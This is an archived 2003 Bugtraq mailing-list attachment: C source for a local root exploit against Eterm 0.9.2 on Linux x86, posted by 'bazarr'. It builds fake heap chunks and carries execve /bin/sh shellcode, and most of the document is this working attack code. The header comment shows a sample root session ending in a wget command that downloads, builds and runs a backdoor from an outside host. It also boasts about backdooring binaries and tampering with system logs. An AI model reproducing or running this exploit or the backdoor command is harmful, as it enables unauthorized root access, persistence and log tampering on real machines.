102917 2003-05-30  08:26  /578 rader/ bazarr@ziplip.com <bazarr@ziplip.com>
Bilagans filnamn: "bazarr-episode-3.c"
Importerad: 2003-05-30  08:26  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: bazarr@ziplip.com
Mottagare: Bugtraq (import) <5067>
Bilaga (text/plain) till text 102916
Ärende: Bilaga (bazarr-episode-3.c) till: BAZARR CODE NINER PINK TEAM GO GO GO
------------------------------------------------------------
/* 0day Eterm <= 0.9.2? x86                                  		*/
/*      0day local root xploit for Eterm				*/
/* 	dis code is copyrighted(C) by me bazarr				*/ 
/*      compiles on linux x86                           		*/
/*      by: bazarr  3/11/03                             		*/
/* 	bazarr@ziplip.com	 					*/


/* 
* 2 #darknet girls go round da outside round da outside round da outside 
* 2 #darknet girls go round da outside round da outside round da outside 
*			   bazarr is back 
*      			   tell a freind

* DIS ADVISORY/XPLOIT HAS BEEN CENSORED AGAIN.  I PUT A LOCAL ROOT .c
* WHEN DIS LIST IS GOING DOWN SOUTH QUICK WID CROSS SITE SCRIPTING
* BUGS.  AND I AM CENSORED SO HEAVILY ITS NOT EVEN FUNNY. IM TRYING
* TO HELP DA GREAT BUGTRAQ HERE.
* http://geocities.com/rrazab/bazarr-unsencored-episode-3.c

* THE REAL ADVISORY CAN BE FOUND THERE.

* this bug is a static data buffer overflow wich be many a trickyness
* to xploit.  but i have managed to xploit dis on linux
* x86. xploiting on freebsd might be a different xploit all together
* since i be using da dlmalloc implementation to hack eterm(bbp! i be
* reading your paper).

* many a people like to use Eterm while i use gnome-terminal cuz it
* so easy to config.  when Eterm is installed it normally is
* installed suid root on many a install.  but on many a distros it is
* installed as part of default applications package.  ie: debian
* installs eterm setgid utmp by default.  hi martin.

* so by xploiting dis bug on default install of debain you will obtain local gid utmp. 
* den you are able to backdoor certain binarys to get root. and able
* to modify  all important log files on da entire system!. CALL ALPHA
* TANGO TEAM.  you can also xploit programs wich handle utmp/wtmp
* insecurely.

* but on many a install you just get root. 


* [c00l:code]$ ./a.out aa #THIS BUG COMMING SOON. DIS BE A PREVIEW
* sh-2.05a# id
* uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l) 
* sh-2.05a# exit
* [c00l:code]$ cc debeterm.c
* [c00l:code]$ ./a.out -t0 #back to the eterm bug 
* [*] Eterm local xploit 
* [*] Copyright(C) drunken fool on the lose (bazarr)
* [*] using retloc 0x8049788 chunkaddr 0x8086af8 retaddr 0xbffeb874
* <terminal gets really messed up from garbage displayed by eterm load_image()>
* in image path.
* Eterm:  Error:  Received terminal signal SIGSEGV (11)
* Eterm:  Error:  Attempting to dump a stack trace....
* GNU gdb 2002-04-01-cvs
* Copyright 2002 Free Software Foundation, Inc.
* GDB is free software, covered by the GNU General Public License, and you are
* welcome to change it and/or distribute copies of it under certain conditions.
* Type "show copying" to see the conditions.
* There is absolutely no warranty for GDB.  Type "show warranty" for details.
* This GDB was configured as "i386-linux"...(no debugging symbols found)...
* Attaching to program: /usr/bin/Eterm, process 25733
* ptrace: Operation not permitted.
* /home/c00l/code/realcode/code/25733: No such file or directory.
* /usr/share/Eterm/gdb.scr:1: Error in sourced command file:
* No stack.
* (gdb) q		<--- this is all you need to do you must type 'q' when gdb starts
* sh-2.05a# id			
* uid=0(root) gid=1001(c00l) groups=1001(c00l)
* sh-2.05a# wget http://pornoganny.org/.owned/bd.tar.gz ; tar zxvf bd.tar.gz ; cd bd ; make ; ./bd & exit  

* -bazarr
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <setjmp.h>
#include <signal.h>	
#include <getopt.h> 			
#include <sys/resource.h>
#include <string.h>								
#include <errno.h>									
#include <sys/time.h>									
#include <netdb.h>
										
#define NORM "\033[0m"				 
#define RED "\033[31m"				          
#define GREEN "\033[37m" //dis used to be green but im too damn lazy to change da name sorry
								
#define CHUNKGUESS 0x8084a28 //dis is da addr in wich findchunk() will start looking 
#define CHUNKEND CHUNKGUESS + 85000 // you might have to change chunkguess 
#define CHUNKARGMAX 35000	
#define CHUNKARGMIN 35000	//stupid!				
#define MAXLINE 1024*4 
#define DUPSTREAM 2	//dis be stderr					
#define HOPELESS 24  	//dis be da number of times i try to xploit eterm 
#define PATH "/usr/bin/Eterm"

/* globls */

typedef struct {
	ssize_t prev_size;
	ssize_t size;
	uint32_t fd;
	uint32_t bk;	
} chunk_t;

typedef struct {
	char *name;
	int chunkaddr;
	int retloc;
	int retaddr;
	uint8_t typenum;
} targ_t;

/* adding types is xplained at da bottom of dis xploit */
/* some people dink dat it funny to have types but i only */
/* have 1 type, but i dont find dat funny */

targ_t targ[] = {
	{"debian 3.0 w00dy (Eterm 0.9.2)",0x8085ae8,0x8049794,0xbffeb874,0},
	{NULL}
}; 

/* if you on a remote box you need to set dis */
/* it has nothing to do wid da xploit though  */
/* eterm just does a little check for display */
/* when it starts */
 
static char *display = NULL;
static pid_t cpid = 0;
static int chunkaddr = 0;
static int retloc = 0;
static int retaddr = 0;
static uint8_t verbose;
static uint8_t brute = 0;


char shellcode[] =

/* this xploit even uses custom shellcode 	*/
/* all dis by bazarr it so cool isnt it?	*/

/* oh... :( */ 

/* main: */

	/* dis be a sigprocmask call			*/
	/* can you see how cool it works?	  	*/	
	/* take a look at da sigfillset() src code 	*/
  	/* den you see what i be doing 			*/

        "\x31\xdb"              /* xorl %ebx,%ebx */
        "\x31\xc0"              /* xorl %eax,%eax */
        "\x31\xd2"              /* xorl %edx,%edx */
        "\xb0\x7e"              /* movb $126,$al  */	
        "\x43\x43"              /* inc %ebx 2x    */
        "\x6a\xff"              /* pushl $0xffffffff */  
        "\x89\xe1"              /* movl %esp,%ecx */
        "\xcd\x80"              /* int $0x80      */

	"\x31\xc0"		/* xorl %eax,%eax  */
	"\x31\xdb"  		/* xorl %ebx,%ebx  */	
	"\xb0\x17"		/* movb $0x17,%al  */
	"\xcd\x80"		/* int $0x80	   */

        "\x31\xc0"              /* xorl %eax,%eax */
        "\xb0\x0b"              /* movb $0xb,%al  */
        "\x99"                  /* cdq            */
        "\x52"                  /* pushl %edx     */        
	"\x68\x2f\x2f\x73\x68"  /* pushl $0x68732f2f */
        "\x68\x2f\x62\x69\x6e"  /* pushl $0x6e69622f */
        "\x89\xe3"              /* movl %esp,%ebx */
        "\x52"                  /* pushl %edx     */
        "\x53"                  /* pushl %ebx     */
        "\x89\xe1"              /* movl %esp,%ecx */
        "\xcd\x80";             /* int $0x80      */

char jmp[] = "\xeb\x0e";	

int findchunk(void);
void killeterm(int sig); //i dont use dis , it just here watever watever
int xploit(void);
void usage(void);
void mesg(void);

void killeterm(int sig) {
	printf("HELLO\n");
	kill(cpid,SIGKILL);
}

/* 

CENSORED

*/

int xploit(void) {
	
	char shell[25600];       //real big so we can ensure a steady retaddr
        #ifndef TEST
        char chunkarg[CHUNKARGMAX];
        #endif
        #ifdef TEST
        char chunkarg[CHUNKARGMIN]; //if this is big it'll be put around rs_name      
        #endif
	char pathchunk[22600];	 
	char sendbuf[1024]; 
	char *ptr = NULL;
	char genbuf[128];
	char cmdbuffer[sizeof(chunkarg)+strlen(PATH)+14];
		
	chunk_t chunk; //we need 2 fake chunks but seeing as they can be the same we use 1 so we can land on whatever 
	int i = 0;
	pid_t pid = 0;
	int fd[2];
	int fd2[2];
	int n = 0;

	bzero(&chunk,sizeof(chunk));

	
	/* take care of retaddr */
	
	ptr = shell;
	
	for (i = 0 ; i < sizeof(shell) - (24 + strlen(shellcode)+18) ;i+=2) {
		sprintf(ptr,jmp);  //fmt string attack returns from da grave!
		ptr += strlen(jmp);	//in new version dis will be patched
 	}			//we be using strcat next time 
					
	memset(ptr,0x99,24);	
	ptr += 24;			
	
	for (i = 0; i < strlen(shellcode);i++) {
		*(ptr++) = shellcode[i];
	}

	shell[sizeof(shell)-2] = '\0';
		
	/* take care of path buffer with address of chunks */
	
	ptr = pathchunk;
	
	for (i = 0; i < sizeof(pathchunk);i+=4) {
        	*((void**)ptr) = (void*)(chunkaddr);
		ptr += 4;
	}

	pathchunk[sizeof(pathchunk)-2] = '\0';
	
	/* take care of fake chunks */
	
	ptr = chunkarg;
	
	chunk.prev_size = 0xfffffff0;
	chunk.size = 0xfffffff8;
	chunk.fd = retloc - 12;		//we need 2 fake chunks but we can make them both the same 	 		
	chunk.bk = retaddr;		

	for (i = 0; i < sizeof(chunkarg) - 16;i+=16) {
		memcpy(ptr,&chunk,sizeof(chunk));
		ptr += 16;
	}
	
	chunkarg[sizeof(chunkarg)-2] = '\0';

	system("killall -9 Eterm 2>/dev/null ; killall -9 gdb 2>/dev/null");
	setenv("CODE",shell,1);
	setenv("ETERMPATH",pathchunk,1);	//THIS IS DONE THIS WAY TO POKE FUN AT A PERSON 
	setenv("CHUNKARG",chunkarg,1);			
	#ifdef TEST			
	system("/bin/bash");	
	#endif					
	#ifndef TEST
	system("/usr/bin/Eterm --term-name $CHUNKARG"); 
	#endif
	return -1;
} 


/* 

CENSORED

*/

int findchunk(void) {

        char recvbuf[MAXLINE] = {0};
        
	#ifdef TEST
	char chunkarg[CHUNKARGMIN] = {0};
        #endif 
	#ifndef TEST
	char chunkarg[CHUNKARGMAX] = {0};
	#endif 
	
	char pathenv[22580];
	char extra[25600]; //we dont want major changes from here to xploit 
	char *p = pathenv;
	char *pp;

	int chunkguess = CHUNKGUESS;
        size_t n = 0;
        int fd[2],i;
	pid_t pid;
	chunk_t chunk;
	uint8_t offset = 0,findoff = 0,twice = 0;
	
	
	signal(SIGALRM,killeterm);

	bzero(pathenv,sizeof(pathenv));
	bzero(chunkarg,sizeof(chunkarg));
		
	chunk.prev_size = 0x41414141;  //dis be D
	chunk.size = 0x42424242;	//dis be C
	chunk.fd = 0x43434343;	 //dis be B
	chunk.bk = 0x44444444;	 //dis be A 
	
	
	memset(extra,0x41,sizeof(extra));
	extra[sizeof(extra)-1] = '\0';
	setenv("CODE",extra,1);

	p = pathenv;
	
	while (chunkguess < CHUNKEND) {
                bzero(recvbuf,sizeof(recvbuf));
		
		
		if (!findoff) {
			memset(chunkarg,0x41,sizeof(chunkarg)-2);
			chunkarg[sizeof(chunkarg)-1] = '\0';
		}	
		
		else {
			p = chunkarg;
	
			for (i = 0 ; i < sizeof(chunkarg);i+=16) {
				memcpy(p,&chunk,sizeof(chunk));
				p += 16;
			}
			chunkarg[sizeof(chunkarg)-2] = '\0';
			p = pathenv;
		}	
		
                if (pipe(fd)<0) {
                        perror("pipe");
                        exit(-1);
                }

                if ((pid = fork())<0) {
                        perror("fork");
                        exit(-1);
                }

                if (pid == 0) {
			cpid = getpid();
	      		
			for (i = 0; i < sizeof(pathenv)-1;i+=4) {
				*((void**)p) = (void*)(chunkguess);
				p += 4;
			}
			
			pathenv[sizeof(pathenv)-2] = '\0';
			setenv("ETERMPATH",pathenv,1);
	
	                close(fd[0]);

			if (dup2(fd[1],DUPSTREAM)!=DUPSTREAM) { 
                                perror("dup2");
                                _exit(-1);
                        }
			alarm(1);
			close(STDOUT_FILENO);			
			execl(PATH,PATH,"--term-name",chunkarg,0);
                    	_exit(-1);
                }

                if (pid > 0) {
			
			close(fd[1]);
                        if ((n = read(fd[0],recvbuf,MAXLINE-1))<=0) {
                		if (n == 0) {
					system("killall -9 Eterm 2>/dev/null ; killall -9 gdb 2>/dev/null");
				}
				else { 
		               		perror("read");
                               		exit(-1);
                        	}
			}
			system("killall -9 Eterm 2>/dev/null ; killall -9 gdb 2>/dev/null");
			if (!findoff) {
				if ((pp = strchr(recvbuf,'A'))) {
					fprintf(stderr,"[+] found offset from recvbuf %d\n",(pp - recvbuf));
					offset = (pp - recvbuf);	
					//this shit should be 39 on all eterms
					if (offset > 39 && (twice != 3)) { 
					//chances be good we came into it on a fucked up way 
						findoff = 0;			
						twice++;		
						continue;
					}
					findoff = 1;
					continue;		
				}		
			}
		}
		recvbuf[offset+8] = '\0';
                if (verbose) {
			printf("%s\n",recvbuf+offset);	//we only look at the first 8 bytes 
                }
		if (strstr(recvbuf+offset,"CCCCDDDD")) { //this is the addr we pass to free in eterm 
			chunkaddr = chunkguess;	
		        return 0;		
                }				 
                else {				 
			if (!findoff) {
				chunkguess += 4200; //dis be big	
				continue;
			}
			else if (findoff) {
				chunkguess += 4; //dis be small 
	    			continue;
			}
                }
        }
        return -1;
}

void mesg(void) { 
	fprintf(stderr,""RED"[*] local Eterm xploit\n"); 
	fprintf(stderr,""GREEN"[*] Copyright(C) drunken fool on the lose (bazarr)\n");
}

void listtypes(void) {
        register uint8_t i = 0;

        fprintf(stderr,""RED"Types:\n");
        for (i = 0;targ[i].name != NULL;i++) {
                fprintf(stderr,""GREEN"\t%s | retloc 0x%x"
		" | retaddr 0x%x | chunkaddr 0x%x | type# %u\n"NORM"",targ[i].name,
                targ[i].retloc,targ[i].retaddr,targ[i].chunkaddr,targ[i].typenum);

        }
        putchar('\n');
}

void usage(void) {

        fprintf(stderr,
        ""RED"debian <= 3.0 eterm local gid utmp\n"
        ""GREEN"usage:\n"
        "       -v       /* verbose debuging stuff                                     */\n"
        "       -r (int) /* set retloc address                                         */\n"
        "       -c (int) /* set chunk address                                          */\n"
	"       -R (int) /* set return address                                         */\n"
        "       -f       /* find chunk address only (use to make a new type)           */\n"
	"       -l       /* list types                                                 */\n"
	"       -d (str) /* set display (this has nothing to do with the xploit)       */\n"NORM);
	exit(0);
}

int main(int argc,char **argv) { //college professor is it char *argv[] or char **argv?
	int c;
	uint8_t typenum,numtypes;
	uint8_t i,didit = 0;
		
	signal(SIGPIPE,SIG_IGN);

	for (i = 0; targ[i].name != NULL;i++);
	numtypes = i;

	opterr = 0;
	
	while ((c = getopt(argc,argv,"R:d:t:r:c:vfbl"))!=EOF) {
		switch (c) {
			case 'r': 
				sscanf(optarg,"%p",&retloc);
				break;
			case 'c':
				sscanf(optarg,"%p",&chunkaddr);
				break;
			case 'R':
				sscanf(optarg,"%p",&retaddr);
				break;
			case 'v':
				verbose = 1;
				break;
			case 'f':
				mesg();
				if (findchunk()==0) {
					fprintf(stderr,"[*] found chunk address at (0x%x)\n"NORM,chunkaddr);
				}
				else {
					fprintf(stderr,"[*] coulden't find chunkaddr\n"NORM);
				}	
				exit(0);
			case 'b':
				brute = 1;
				break;
			case '?':
				usage();
				break;
			case 't':
				typenum = atoi(optarg);
				didit = 1;
				if (typenum >= numtypes) {
					usage();
				}
				break;
			case 'l':
				listtypes();
				exit(0);
				break;
			case 'd':
				display = optarg;
				setenv("DISPLAY",optarg,1);
				break;
			default:
			 	usage();
		}
	}

	if (!didit) {
		usage();
	}

	mesg();
		
	if (!chunkaddr) { chunkaddr = targ[typenum].chunkaddr; }
	if (!retloc) { retloc = targ[typenum].retloc; }
	if (!retaddr) { retaddr = targ[typenum].retaddr; } 
		
	fprintf(stderr,"[*] using retloc 0x%x chunkaddr 0x%x retaddr
0x%x\n"NORM,retloc,chunkaddr,retaddr);
		
	xploit();
	
	if (!brute) {
		exit(0);
	}	
	
	for (i = 0; i < HOPELESS;i++) {
		xploit(); //this really inst brut forcing anything its just retrying till our chunkaddr comes back
	}		  //into the spot we want it to wich should take like at the max 10 times 
		
	exit(-1);
}	


/* 

to make a new type run follow deese steps (THEY COOL STEPS)

CENSORED

*/

/* 
          .=.
         //(`)_
     //`\/ |\ O`\\
     ||-.\_|_/.-||
     )/ |_____| \(
     O  # \ / #  O
       (| 0 o |)
        |  *  |
    O.__.\---/.__.O
     `._  `"`  _.'
        / ;  \ \
      O'-' )/`'-0
          O`    the fucking enraged clown. bazarr.
	
*/
(102917) /bazarr@ziplip.com <bazarr@ziplip.com>/(Ombruten)